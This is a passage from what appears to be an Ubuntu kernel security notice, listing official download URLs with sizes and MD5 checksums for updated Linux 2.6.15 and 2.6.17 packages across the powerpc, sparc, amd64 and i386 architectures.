    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-27-powerpc-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:   250938 37924f32b6cd4b2c228d18ee367dbbd4
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-27-powerpc64-smp-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:   233674 6b72164a9072487291cd51994ace4e32
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-27-powerpc-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:    13030 9eaed29079c64e0f25e11e7133e99ca8
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-27-powerpc64-smp-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:    13524 2f1baefc32a987c828735ca81a5148a8
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-27-powerpc-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:    84834 5358cb05855533fe014815c521970ba5
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-27-powerpc64-smp-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:    52190 2f80eb6c45f7cfe60683853aec218406
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-27-powerpc-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:    73930 33e53c929b8e2d2fa33f9b5d742d7d4f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-27-powerpc64-smp-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:    85846 e0fe7aadc3a97555fa12d7d557179a15
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-27-powerpc-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:     6612 291398f435c800e0552daf2998bf45aa
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-27-powerpc64-smp-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:     7062 7f2a2c91398b8b8050430ad5d2a8fdea
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-27-powerpc-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:    60356 871f13193a07e5e23534588bfa6c5c44
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-27-powerpc64-smp-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:    70344 bbbccd91d80174d0e4e450b9c2f9906a
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-27-powerpc-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:   128540 d3c9695542baf821a0f44c5eed501218
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-27-powerpc64-smp-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:   157796 ea196b9fb8966e54c17bcef60048f5ae
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-27-powerpc-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:   107932 c31372441d640514d633e1cb4db26261
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-27-powerpc64-smp-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:   125996 131d811e5a17054e0c23d2fc9f1c14ef
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-27-powerpc-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:    87250 032be0df0c0520305ea5254ee02d391a
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-27-powerpc64-smp-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:    93266 f88e14fbf4270916eadfa4026f42e373
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-27-powerpc-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:  2013960 86947d67259b7f62767ec1b3e212dc0c
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-27-powerpc64-smp-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:  1988028 970cd73af7f10575a702d145ec69b1a1
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-27-powerpc-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:   104112 e2077b3576f7cda45a1b16f7156d3682
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-27-powerpc64-smp-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:   115702 df91fba7857d188a75bac18b7304f594
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-27-powerpc-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:    12740 1516420eb578e0578846ee1df9aa3a65
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-27-powerpc64-smp-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:    14436 2544f6fd0be61545be0a8dad1fa7235e
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-27-powerpc-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:    39952 345cbf3d4b585e10fee8140754c2345b
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-27-powerpc64-smp-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:    41468 18b1f0231471598c82cc4cf02db82370
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-27-powerpc-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:   149100 41aed0931aa8d5b2985daf56c7810deb
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-27-powerpc64-smp-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:   167802 ede60fe786e29b78f7057a2b92f9b19b
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-27-powerpc-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:    42270 f99f3fa4f894a92ce8708472da1028a1
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-27-powerpc64-smp-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:    44866 8244061d9d239cff6eab029784526981
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-27-powerpc-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:   320282 27cc215d864a6b942a5c48217db37b2e
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-27-powerpc64-smp-di_2.6.15-27.50_powerpc.udeb
      Size/MD5:   324714 0a4bc3c821b1237fdd1ba536fb97db3c

  sparc architecture (Sun SPARC/UltraSPARC)

    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-27-sparc64-di_2.6.15-27.50_sparc.udeb
      Size/MD5:    50460 fc558d41fa6ab98bcac4e2a22621d70e
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-27-sparc64-di_2.6.15-27.50_sparc.udeb
      Size/MD5:     2356 5543352dc8582676beb493df0a3f717d
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-27-sparc64-di_2.6.15-27.50_sparc.udeb
      Size/MD5:    40242 8b4a35539104438178b1baec2f434ce9
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-27-sparc64-di_2.6.15-27.50_sparc.udeb
      Size/MD5:   110438 49c7267a9bba583602fc768ac02cdaf8
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-27-sparc64-di_2.6.15-27.50_sparc.udeb
      Size/MD5:    40728 c4249040642373c62706d1d6faf119bd
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-27-sparc64-di_2.6.15-27.50_sparc.udeb
      Size/MD5:   104234 4bb5b5175feb607435eba115463f890d
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-27-sparc64-di_2.6.15-27.50_sparc.udeb
      Size/MD5:     7436 deda07ddbc1b0f8762314297a612c37d
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-27-sparc64-di_2.6.15-27.50_sparc.udeb
      Size/MD5:   148810 d9cf3d3fcb7fc997f6b9ed62a8792553
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-27-sparc64-di_2.6.15-27.50_sparc.udeb
      Size/MD5:  1707218 ade3536f29fa5d3b5330aa9400bda504
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-27-sparc64-smp_2.6.15-27.50_sparc.deb
      Size/MD5:   766056 4d721072e4198e9525cb8d2482baae56
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-27-sparc64_2.6.15-27.50_sparc.deb
      Size/MD5:   765028 5b72c0aa55a53b5c816b5087dbcdc1df
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-27_2.6.15-27.50_sparc.deb
      Size/MD5:  6951130 1f9b65c3cfdafdbeab3b838304ac9551
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-27-sparc64-smp_2.6.15-27.50_sparc.deb
      Size/MD5: 14997088 44d34e4f5b0325b021bcf9ee76ac7e78
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-27-sparc64_2.6.15-27.50_sparc.deb
      Size/MD5: 14812084 de5658777fb8370651a8f7696c0ce24d
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-27-sparc64-di_2.6.15-27.50_sparc.udeb
      Size/MD5:     7422 d58ca2513f3ac089d3bd3a41853230eb
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-27-sparc64-di_2.6.15-27.50_sparc.udeb
      Size/MD5:   248506 d82b7a39e7ef205312aee16bbf33be78
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-27-sparc64-di_2.6.15-27.50_sparc.udeb
      Size/MD5:   212268 8998deff4164c5ffea8e42a66206d83f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-27-sparc64-di_2.6.15-27.50_sparc.udeb
      Size/MD5:  1048466 bbcf990a0b9fe9cd793a3d6770eadeee
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-27-sparc64-di_2.6.15-27.50_sparc.udeb
      Size/MD5:  1421590 439951134944d9492e6f863ec660b4be
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-27-sparc64-di_2.6.15-27.50_sparc.udeb
      Size/MD5:    10110 c1f718a3500a1bb23292111c6d700c29
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-27-sparc64-di_2.6.15-27.50_sparc.udeb
      Size/MD5:    40180 43e3ebb6781191bc7322aa673381345a
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-27-sparc64-di_2.6.15-27.50_sparc.udeb
      Size/MD5:     9360 398ee0063de2b3b75566fc6f823bc83d
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-27-sparc64-di_2.6.15-27.50_sparc.udeb
      Size/MD5:    61430 46e6821a25874cf5f166479c7a280388
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-27-sparc64-di_2.6.15-27.50_sparc.udeb
      Size/MD5:   163004 1d4aba9731615d37906e679634689976
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-27-sparc64-di_2.6.15-27.50_sparc.udeb
      Size/MD5:    63930 d9f858a3eee13601059fd180ada7e5c8
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-27-sparc64-di_2.6.15-27.50_sparc.udeb
      Size/MD5:  1235014 c2e28607b62b802e7c0f765146ee865f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-27-sparc64-di_2.6.15-27.50_sparc.udeb
      Size/MD5:    59358 26c834cb8727cc9c9b2aa672a9ad29c7
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-27-sparc64-di_2.6.15-27.50_sparc.udeb
      Size/MD5:    37398 64db7cf6f0e4c790cfea0141157957f1
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-27-sparc64-di_2.6.15-27.50_sparc.udeb
      Size/MD5:   280074 313cbda5c5aadff81a23ff3502d30830

Updated packages for Ubuntu 6.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-source-2.6.17_2.6.17.1-10.34.diff.gz
      Size/MD5:  2139936 21d70e4a166eff19397917311900a9da
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-source-2.6.17_2.6.17.1-10.34.dsc
      Size/MD5:     2321 a0281329886491604425c136a5ffc9e9
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-source-2.6.17_2.6.17.1.orig.tar.gz
      Size/MD5: 59339565 2e5451201e38e865cbc7b0717fa124a1

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-doc-2.6.17_2.6.17.1-10.34_all.deb
      Size/MD5:  4505336 f0ecd77fc81e008ec925b1b6ab8a5e6f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-kernel-devel_2.6.17.1-10.34_all.deb
      Size/MD5:  1096202 abf30466a458b293e344e557b8f7d089
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-source-2.6.17_2.6.17.1-10.34_all.deb
      Size/MD5: 46081322 872d7415b415f315b607dcfae7709b22

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)

    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/acpi-modules-2.6.17-10-generic-di_2.6.17.1-10.34_amd64.udeb
      Size/MD5:    28610 e448302cfef12693a3086e0c48501d0d
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-10-generic-di_2.6.17.1-10.34_amd64.udeb
      Size/MD5:    50490 de890fd0c43d081b1b19cd4322ac366f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/crc-modules-2.6.17-10-generic-di_2.6.17.1-10.34_amd64.udeb
      Size/MD5:     2446 4717d341dd43798fd5bccbc0ea7210ad
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-10-generic-di_2.6.17.1-10.34_amd64.udeb
      Size/MD5:    40732 86a9918852286071ec5ede8278236a81
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-10-generic-di_2.6.17.1-10.34_amd64.udeb
      Size/MD5:   113430 e840a49b20328625f3c23ee2e304614c
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-10-generic-di_2.6.17.1-10.34_amd64.udeb
      Size/MD5:    43640 5fc124f4d14d58504a1a5fbe5c49db94
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fb-modules-2.6.17-10-generic-di_2.6.17.1-10.34_amd64.udeb
      Size/MD5:    54024 fb978937130fa53cf65ba753b53f00c1
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/firewire-core-modules-2.6.17-10-generic-di_2.6.17.1-10.34_amd64.udeb
      Size/MD5:   189524 c322470b38782177dd04594cf4cf0629
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/floppy-modules-2.6.17-10-generic-di_2.6.17.1-10.34_amd64.udeb
      Size/MD5:    40026 5c7d62e36535c69cd94ded063a3ad07d
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-10-generic-di_2.6.17.1-10.34_amd64.udeb
      Size/MD5:   167746 a0682c9920cf20648e9103b548ce5590
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-10-generic-di_2.6.17.1-10.34_amd64.udeb
      Size/MD5:    60444 714010ced1919028330b3855c0efe1d0
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-10-generic-di_2.6.17.1-10.34_amd64.udeb
      Size/MD5:   154444 c4dcaa68b92594197993abd00458211f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/irda-modules-2.6.17-10-generic-di_2.6.17.1-10.34_amd64.udeb
      Size/MD5:   314690 d4a076c38598332582b752fe8401332d
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/jfs-modules-2.6.17-10-generic-di_2.6.17.1-10.34_amd64.udeb
      Size/MD5:   105982 2661373b592fee0b106efd9923c8c2d8
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-10-generic-di_2.6.17.1-10.34_amd64.udeb
      Size/MD5:  1903422 720237830dd97033c4565765b13bf2de
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-10-generic_2.6.17.1-10.34_amd64.deb
      Size/MD5:   904248 a96cb082cf0c1969964570665be5cb61
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-10-server_2.6.17.1-10.34_amd64.deb
      Size/MD5:   911828 5bc709421e05d5e13ccbbe86218d7d61
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-10_2.6.17.1-10.34_amd64.deb
      Size/MD5:  7426374 5284a05a34fb9094108bd44bb2096e23
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-10-generic_2.6.17.1-10.34_amd64.deb
      Size/MD5: 23866090 2e64699b7a8cc4b50ccf03e57e41610a
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-10-server_2.6.17.1-10.34_amd64.deb
      Size/MD5: 24757484 c3720d1e108910be941886e7a7eb6d7e
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-10-generic_2.6.17.1-10.34_amd64.deb
      Size/MD5:  2337492 9be16967f3d59f19a97195b91e23b0aa
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-10-server_2.6.17.1-10.34_amd64.deb
      Size/MD5:  2336234 8b563e34423e27f5478b19269bd71f25
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-libc-dev_2.6.17.1-10.34_amd64.deb
      Size/MD5:  1769862 a71cb98a7b9670cbb26447bca3b1d48d
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-10-generic-di_2.6.17.1-10.34_amd64.udeb
      Size/MD5:    16786 3dfde1d0f22840fd7c8c0b92a0697dc0
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-10-generic-di_2.6.17.1-10.34_amd64.udeb
      Size/MD5:   279170 238ed7876768bd4e5060186bf30e1247
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-10-generic-di_2.6.17.1-10.34_amd64.udeb
      Size/MD5:   256920 2e068cdec7709057890b11e670fca7e6
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-10-generic-di_2.6.17.1-10.34_amd64.udeb
      Size/MD5:  1048488 42795594965faf168a919b87f4f9264b
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-10-generic-di_2.6.17.1-10.34_amd64.udeb
      Size/MD5:  2103858 23a01b8e6d21eaf28a522d02bc4e7d3e
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-pcmcia-modules-2.6.17-10-generic-di_2.6.17.1-10.34_amd64.udeb
      Size/MD5:   164434 452611b5fb0749f326bc377d68b9ed35
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-10-generic-di_2.6.17.1-10.34_amd64.udeb
      Size/MD5:    10502 6e4f4e6c3e3c9f24504ac4d3c618bd23
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-usb-modules-2.6.17-10-generic-di_2.6.17.1-10.34_amd64.udeb
      Size/MD5:    93358 1ba446f3b8b750656979c51f0a8785bd
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ntfs-modules-2.6.17-10-generic-di_2.6.17.1-10.34_amd64.udeb
      Size/MD5:    52572 8728189f4d3adb7d14efddad30da1dae
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/parport-modules-2.6.17-10-generic-di_2.6.17.1-10.34_amd64.udeb
      Size/MD5:    39814 5dd7145862f437818be5a82ef852aab8
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-modules-2.6.17-10-generic-di_2.6.17.1-10.34_amd64.udeb
      Size/MD5:    79814 436babd26f19cf2215140f6146b0d24a
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-storage-modules-2.6.17-10-generic-di_2.6.17.1-10.34_amd64.udeb
      Size/MD5:     6336 3f78dffca48ff8b0ecd8746124ac6cc2
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/plip-modules-2.6.17-10-generic-di_2.6.17.1-10.34_amd64.udeb
      Size/MD5:     9366 80a7f60284f095e2ece51584ef19cf9d
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-10-generic-di_2.6.17.1-10.34_amd64.udeb
      Size/MD5:    62716 4b67a0b5190f8ea8618df7c4dc2b7081
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/reiserfs-modules-2.6.17-10-generic-di_2.6.17.1-10.34_amd64.udeb
      Size/MD5:   138614 41c4279020abaa9c650777d67b28fb57
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/sata-modules-2.6.17-10-generic-di_2.6.17.1-10.34_amd64.udeb
      Size/MD5:   115654 4d7635b1295286c5abce3bfe63c7fd8a
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-10-generic-di_2.6.17.1-10.34_amd64.udeb
      Size/MD5:    90606 f5b3a2167d5287401159a84db252cd41
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-10-generic-di_2.6.17.1-10.34_amd64.udeb
      Size/MD5:  1286184 ce67ddbc73afeda819fb71e77f3b51c5
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/serial-modules-2.6.17-10-generic-di_2.6.17.1-10.34_amd64.udeb
      Size/MD5:    80590 74a7f4312f98ce764fa9c758117c12e3
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/socket-modules-2.6.17-10-generic-di_2.6.17.1-10.34_amd64.udeb
      Size/MD5:    13478 35c7ba75d0ebf5c0c9a8c8ad155da259
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/speakup-modules-2.6.17-10-generic-di_2.6.17.1-10.34_amd64.udeb
      Size/MD5:    76260 0cf13fb1a74726203878619c4e25ad3e
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ufs-modules-2.6.17-10-generic-di_2.6.17.1-10.34_amd64.udeb
      Size/MD5:    36064 6432af2dda1af0e93e2e98c618dbc78e
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-10-generic-di_2.6.17.1-10.34_amd64.udeb
      Size/MD5:   151816 cbffe2ed7df011968be6061d56a7dbeb
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-10-generic-di_2.6.17.1-10.34_amd64.udeb
      Size/MD5:    53552 f0a3fa4a17e0d17dda78e5ece15e2de3
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-10-generic-di_2.6.17.1-10.34_amd64.udeb
      Size/MD5:   323424 179061e815cd273342eef552e707040c

  i386 architecture (x86 compatible Intel/AMD)

    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/acpi-modules-2.6.17-10-386-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:    21214 9c9c69488c55ba4cebd162c2c7f25880
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/acpi-modules-2.6.17-10-generic-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:    23816 638e22fd9bde2c8a48952aa42034e1f8
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-10-386-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:    43886 3b39b554ca45effb392a36cb3d613292
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-10-generic-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:    44476 761e97fe9ed608a5ec4d910a19fb9c39
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-modules-2.6.17-10-386-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:   104804 d48a8674c175877e34dd72dd8b9f9b95
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-modules-2.6.17-10-generic-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:    49414 7fbf0ec95f29a6791398a80d0a75b391
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/crc-modules-2.6.17-10-386-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:     2366 5566383bc73d4eb40665c59a8e4e23d6
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/crc-modules-2.6.17-10-generic-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:     2388 eef320b2fe8ca4b24eff2dbe5c137015
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-10-386-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:    35214 cbd58b4b0827dfe0a290c3656ccc764f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-10-generic-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:    36622 0c06dfc8b3abb00e1643337000b3d08c
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-10-386-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:    98128 54a0e653b32e6a953fcfc9e8e9268064
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-10-generic-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:   103388 d438eed9d0cc66407bf4117d2402a97d
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-10-386-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:    38466 6812aa2597aa4979260654eb2cc10f2b
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-10-generic-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:    39230 66eccf9467cf0c6b321b12ad6b66b990
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fb-modules-2.6.17-10-386-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:    44268 6cd91b7ded749d9978ba2a762732cc56
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fb-modules-2.6.17-10-generic-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:    44662 32f3c23d748c17276a079f1f30638b4f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/firewire-core-modules-2.6.17-10-386-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:   172758 642eed596c80636627635e9a0e00c4db
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/firewire-core-modules-2.6.17-10-generic-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:   175174 1042bb0e624f3879f7fca07a7aeeb396
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/floppy-modules-2.6.17-10-386-di_2.6.17.1-10.34_i386.udeb
      Size/MD5:    33756 93906998ade3550a0f7be585c54681c3
